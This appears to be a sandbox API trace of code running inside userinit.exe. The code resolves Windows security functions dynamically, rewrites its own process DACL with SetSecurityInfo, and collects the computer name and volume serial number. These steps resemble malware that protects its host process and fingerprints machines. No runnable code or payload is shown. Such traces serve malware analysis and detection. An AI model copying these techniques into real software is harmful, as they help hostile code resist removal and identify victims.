[0100.394] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff770, pSourceSid=0x2a6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x29ff770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0100.394] IsValidSid (pSid=0x29ff770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0100.394] ConvertSidToStringSidA () returned 0x1
[0100.394] LocalFree (hMem=0x29c1c8) returned 0x0
[0100.394] LocalFree (hMem=0x2a6f70) returned 0x0
[0100.394] ConvertStringSidToSidA () returned 0x1
[0100.394] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff7f8, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x29ff7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0100.394] IsValidSid (pSid=0x29ff7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0100.394] ConvertSidToStringSidA () returned 0x1
[0100.394] LocalFree (hMem=0x29c1c8) returned 0x0
[0100.394] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.394] ConvertStringSidToSidA () returned 0x1
[0100.394] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff880, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x29ff880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0100.394] IsValidSid (pSid=0x29ff880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0100.394] ConvertSidToStringSidA () returned 0x1
[0100.394] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.394] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.394] ConvertStringSidToSidA () returned 0x1
[0100.394] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff90c, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x29ff90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0100.394] IsValidSid (pSid=0x29ff90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0100.394] ConvertSidToStringSidA () returned 0x1
[0100.394] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.394] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.394] ConvertStringSidToSidA () returned 0x1
[0100.394] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ff998, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x29ff998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0100.394] IsValidSid (pSid=0x29ff998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0100.394] ConvertSidToStringSidA () returned 0x1
[0100.394] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.394] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.395] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.395] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0100.395] GetCurrentThread () returned 0xfffffffe
[0100.395] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.395] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0100.395] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0xee954 | out: TokenHandle=0xee954*=0x28d3756) returned 0
[0100.395] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.396] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0100.396] GetCurrentProcess () returned 0xffffffff
[0100.396] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.396] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0100.396] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x29ffa3c | out: TokenHandle=0x29ffa3c*=0x1d0) returned 1
[0100.396] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.396] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0100.396] MapGenericMask (in: AccessMask=0xee7cc, GenericMapping=0xee7d0 | out: AccessMask=0xee7cc)
[0100.396] MapGenericMask (in: AccessMask=0xee900, GenericMapping=0xee904 | out: AccessMask=0xee900)
[0100.397] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.397] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0100.397] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xee914 | out: TokenInformation=0x0, ReturnLength=0xee914) returned 0
[0100.397] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.397] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0100.397] GetLastError () returned 0x7a
[0100.397] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.397] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0100.397] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x2a0780, TokenInformationLength=0x24, ReturnLength=0xee938 | out: TokenInformation=0x2a0780, ReturnLength=0xee938) returned 1
[0100.397] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffab0, pSourceSid=0x2a0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x29ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.397] IsValidSid (pSid=0x29ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.397] ConvertSidToStringSidA () returned 0x1
[0100.397] LocalFree (hMem=0x299e80) returned 0x0
[0100.398] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.398] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0100.398] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffb34, pSourceSid=0x29ffab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x29ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.398] IsValidSid (pSid=0x29ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.398] ConvertSidToStringSidA () returned 0x1
[0100.398] LocalFree (hMem=0x299e80) returned 0x0
[0100.398] IsValidSid (pSid=0x29ffb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.398] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.398] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0100.398] CloseHandle (hObject=0x1d0) returned 1
[0100.398] ConvertStringSidToSidA () returned 0x1
[0100.398] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffa54, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x29ffa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0100.398] IsValidSid (pSid=0x29ffa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0100.398] ConvertSidToStringSidA () returned 0x1
[0100.398] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.399] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.399] ConvertStringSidToSidA () returned 0x1
[0100.399] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffae0, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x29ffae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0100.399] IsValidSid (pSid=0x29ffae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0100.399] ConvertSidToStringSidA () returned 0x1
[0100.399] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.399] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.399] ConvertStringSidToSidA () returned 0x1
[0100.399] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffbfc, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x29ffbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0100.399] IsValidSid (pSid=0x29ffbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0100.399] ConvertSidToStringSidA () returned 0x1
[0100.399] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.399] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.399] ConvertStringSidToSidA () returned 0x1
[0100.399] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffc8c, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x29ffc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0100.399] IsValidSid (pSid=0x29ffc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0100.399] ConvertSidToStringSidA () returned 0x1
[0100.399] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.399] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.399] ConvertStringSidToSidA () returned 0x1
[0100.399] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffd1c, pSourceSid=0x2a6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x29ffd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0100.399] IsValidSid (pSid=0x29ffd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0100.399] ConvertSidToStringSidA () returned 0x1
[0100.399] LocalFree (hMem=0x2a6f58) returned 0x0
[0100.399] LocalFree (hMem=0x2a6f40) returned 0x0
[0100.399] GetCurrentProcessId () returned 0xf7c
[0100.399] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf7c) returned 0x1d0
[0100.400] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.400] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0100.400] GetSecurityInfo () returned 0x0
[0100.403] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.403] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0100.403] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x2a0f28, pControl=0xee6da, lpdwRevision=0xee6d4 | out: pControl=0xee6da, lpdwRevision=0xee6d4) returned 1
[0100.404] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.404] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0100.404] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x2a0f28, pOwner=0xee6d0, lpbOwnerDefaulted=0xee6c4 | out: pOwner=0xee6d0*=0x0, lpbOwnerDefaulted=0xee6c4) returned 1
[0100.404] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.404] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0100.404] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x2a0f28, pGroup=0xee6d0, lpbGroupDefaulted=0xee6c4 | out: pGroup=0xee6d0*=0x0, lpbGroupDefaulted=0xee6c4) returned 1
[0100.404] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.404] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0100.404] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2a0f28, lpbDaclPresent=0xee6c8, pDacl=0xee6bc, lpbDaclDefaulted=0xee6c4 | out: lpbDaclPresent=0xee6c8, pDacl=0xee6bc, lpbDaclDefaulted=0xee6c4) returned 1
[0100.404] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.405] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0100.405] IsValidAcl (pAcl=0x2a0f3c) returned 1
[0100.405] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.405] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0100.405] GetAce (in: pAcl=0x2a0f3c, dwAceIndex=0x0, pAce=0xee55c | out: pAce=0xee55c*=0x2a0f44) returned 1
[0100.405] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29ffe74, pSourceSid=0x2a0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x29ffe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.405] IsValidSid (pSid=0x29ffe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.405] ConvertSidToStringSidA () returned 0x1
[0100.405] LocalFree (hMem=0x2a7018) returned 0x0
[0100.405] GetAce (in: pAcl=0x2a0f3c, dwAceIndex=0x1, pAce=0xee55c | out: pAce=0xee55c*=0x2a0f5c) returned 1
[0100.405] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29fff60, pSourceSid=0x2a0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x29fff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.405] IsValidSid (pSid=0x29fff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.405] ConvertSidToStringSidA () returned 0x1
[0100.405] LocalFree (hMem=0x2a7018) returned 0x0
[0100.405] GetAce (in: pAcl=0x2a0f3c, dwAceIndex=0x2, pAce=0xee55c | out: pAce=0xee55c*=0x2a0f70) returned 1
[0100.406] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29f29c0, pSourceSid=0x2a0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29f29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0100.406] IsValidSid (pSid=0x29f29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0100.406] ConvertSidToStringSidA () returned 0x1
[0100.406] LocalFree (hMem=0x2a7018) returned 0x0
[0100.406] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.406] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0100.406] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x2a0f28, lpbSaclPresent=0xee6cc, pSacl=0xee6c0, lpbSaclDefaulted=0xee6c4 | out: lpbSaclPresent=0xee6cc, pSacl=0xee6c0, lpbSaclDefaulted=0xee6c4) returned 1
[0100.406] LocalFree (hMem=0x2a0f28) returned 0x0
[0100.406] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.406] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.406] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0100.406] GetLengthSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.406] GetLastError () returned 0x0
[0100.406] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.407] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0100.407] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.407] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0100.407] InitializeAcl (in: pAcl=0x2a7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x2a7fa8) returned 1
[0100.407] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.407] GetLengthSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.407] GetLastError () returned 0x0
[0100.407] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.407] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0100.407] SetLastError (dwErrCode=0x0)
[0100.407] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.407] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0100.407] GetSidSubAuthorityCount (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29ff615
[0100.407] GetLastError () returned 0x0
[0100.407] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.407] SetLastError (dwErrCode=0x0)
[0100.407] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.408] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0100.408] GetSidIdentifierAuthority (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29ff616
[0100.408] GetLastError () returned 0x0
[0100.408] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.408] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.408] SetLastError (dwErrCode=0x0)
[0100.408] GetSidSubAuthorityCount (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29ff615
[0100.408] GetLastError () returned 0x0
[0100.408] SetLastError (dwErrCode=0x0)
[0100.408] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.408] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0100.408] GetSidSubAuthority (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x29ff61c
[0100.408] GetLastError () returned 0x0
[0100.408] IsValidSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.408] GetLengthSid (pSid=0x29ff614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.408] GetLastError () returned 0x0
[0100.408] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.408] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0100.408] AddAce (in: pAcl=0x2a7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x292f90, nAceListLength=0x14 | out: pAcl=0x2a7fa8) returned 1
[0100.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.409] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0100.409] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.409] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0100.409] SetSecurityInfo () returned 0x0
[0100.409] CloseHandle (hObject=0x1d0) returned 1
[0100.409] GetComputerNameA (in: lpBuffer=0x29ffd84, nSize=0xee994 | out: lpBuffer="CRH2YWU7", nSize=0xee994) returned 1
[0100.409] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee880, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.409] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xee97c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xee990, lpMaximumComponentLength=0xee98c, lpFileSystemFlags=0xee988, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xee990*=0x90c08a66, lpMaximumComponentLength=0xee98c*=0xff, lpFileSystemFlags=0xee988*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.410] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xee888, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
